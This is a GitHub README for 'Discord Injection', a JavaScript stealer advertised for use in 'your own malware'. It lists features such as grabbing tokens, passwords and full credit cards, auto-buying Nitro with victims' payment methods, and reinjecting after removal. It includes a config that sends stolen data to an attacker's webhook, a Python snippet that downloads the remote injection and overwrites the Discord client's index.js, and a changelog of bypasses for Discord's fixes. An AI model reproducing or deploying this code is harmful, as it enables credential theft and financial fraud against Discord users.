Discord Injection is a simple .js script that you can use for your own malware to inject into discord which comes with many features!
✔ Customizable
✔ Obfuscated (not advanced but the best it can go cuz of string replacement)
✔ Works with Discord-Webhook-Protector
✔ If Injection got removed it injects again!
✔ Works on both Windows and Darwin!
✔ Auto buy nitro! (toggleable)
✔ Pings on info stolen! (toggleable)
✔ Disables login thru QR code!
✔ Grabs Token, Nitro status, Billing Status + more!
✔ Grabs Email & Password for their account. (updates if they change it)
✔ Grabs whole credit card (if they enter one while injection is in)
✔ Notifies when paypal account has been added!
You'll need Git to start off!
git@2.17.1 or higher
# Clone this repository
$ git clone https://github.com/rdimo/Discord-injection.git
Copy the raw url of the injection and then paste it in your code
forking this repo is also a viable way but make sure to go into the code and change the config to your preferences! ⇣⇣⇣
const config = {
webhook: '%WEBHOOK%', //your discord webhook there obviously or use the api from https://github.com/Rdimo/Discord-Webhook-Protector
webhook_protector_key: '%WEBHOOK_KEY%', //your base32 encoded key IF you're using https://github.com/Rdimo/Discord-Webhook-Protector
auto_buy_nitro: true, //automatically buys nitro when the victim adds credit card or paypal account or tries to buy nitro themselves
ping_on_run: false, //sends whatever value you have in ping_val when you get a run/login
ping_val: '@everyone', //change to @here or <@ID> to ping specific user if you want, will only send if ping_on_run is true
embed_name: 'Discord Injection', //name of the webhook thats gonna send the info
embed_icon: 'https://raw.githubusercontent.com/Rdimo/images/master/Discord-Injection/discord atom.png'.replace(/ /g,'%20'), //icon for the webhook thats gonna send the info
embed_color: 8363488, //color for the embed, needs to be hexadecimal (just copy a hex and then use https://www.binaryhexconverter.com/hex-to-decimal-converter to convert it)
injection_url: 'https://raw.githubusercontent.com/Rdimo/Discord-Injection/master/injection.js', //injection url for when it reinjects
... //rest of the config you should NOT touch
};
Don't quite understand how to set it up? Click me!
Example of how you can implement this injection into your own malware
import os
import re
import requests
webhook = 'https://discord.com/apwebhooks/123456789/abcdefghijklmnopqrstuvwxyz'
def inject():
for _dir in os.listdir(os.getenv('localappdata')):
if 'discord' in _dir.lower():
for __dir in os.listdir(os.path.abspath(os.getenv('localappdata')+os.sep+_dir)):
if re.match(r'app-(\d*\.\d*)*', __dir):
abspath = os.path.abspath(os.getenv('localappdata')+os.sep+_dir+os.sep+__dir)
f = requests.get("https://raw.githubusercontent.com/Rdimo/Discord-Injection/master/injection.js").text.replace("%WEBHOOK%", webhook)
with open(abspath+'\\modules\\discord_desktop_core-3\\discord_desktop_core\\index.js', 'w', encoding="utf-8") as indexFile:
indexFile.write(f)
os.startfile(abspath+os.sep+_dir+'.exe')
if __name__ == "__main__":
inject()
No worries, Hazard-Token-Grabber-V2 is a stealer that uses this injection + steals more!
Any ideas on how to improve the injection? Or just think you got something you want to see being added? Open a new issue!
Found a bug? please please please Open a new issue and tell me about it so I can fix it asap
- Grab ip, name etc...
- Grab paypal pass,email (it's possible but only thru a debug func which is hard)
- More settings
Discord-Injection is heavily inspired by stanleys injection but has been upgraded quite alot since
A few snippets are from his injection so huge cred to stan
This project is licensed under the GNU General Public License v3.0 License - see the LICENSE.md file for details
・Educational purpose only and all your consequences caused by you actions is your responsibility
・Selling this Free injection is forbidden
・If you make a copy of this/or fork it, it must be open-source and have credits linking to this repo
v0.1.5 ⋮ 2022-06-13
+ bumped up discord_desktop_core version
v0.1.4 ⋮ 2022-05-22
+ Added support for https://github.com/Rdimo/Discord-Webhook-Protector
+ Additionaly formatting
v0.1.3 ⋮ 2022-05-22
+ Bug fixes + cleaner code
v0.1.2 ⋮ 2022-05-18
+ Minor fixes + cleanup
v0.1.1 ⋮ 2022-05-14
+ Bypasses discords Control-Access-Origin update
v0.1.0 ⋮ 2022-05-13
+ better data parser
v0.0.9 ⋮ 2022-04-17
+ Discord uses discord_desktop_core-3 instead of discord_desktop_core-2 now
v0.0.8 ⋮ 2022-04-15
- Removed 2fa code grabbing since discord fixed it
v0.0.7 ⋮ 2022-04-14
+ Accidently had 2 hypesquad brilliance
v0.0.6 ⋮ 2022-04-13
+ Discriminator doesn't get mixed up with the ID
v0.0.5 ⋮ 2022-04-08
+ Formatting
+ bug fixes
v0.0.4 ⋮ 2022-03-31
+ Cleanup
v0.0.3 ⋮ 2022-03-31
+ Fixed Typo
v0.0.2 ⋮ 2022-03-30
+ Added new seperate function that sends out when a nitro code has been purchased
+ Fixed 2fa code grabber
+ Fixed auto nitro buyer
v0.0.1 ⋮ 2022-03-28
+ Added BetterDiscord support
+ Added dead code into obfuscation to protect even more
- Re-added status code checker since I Accidently removed it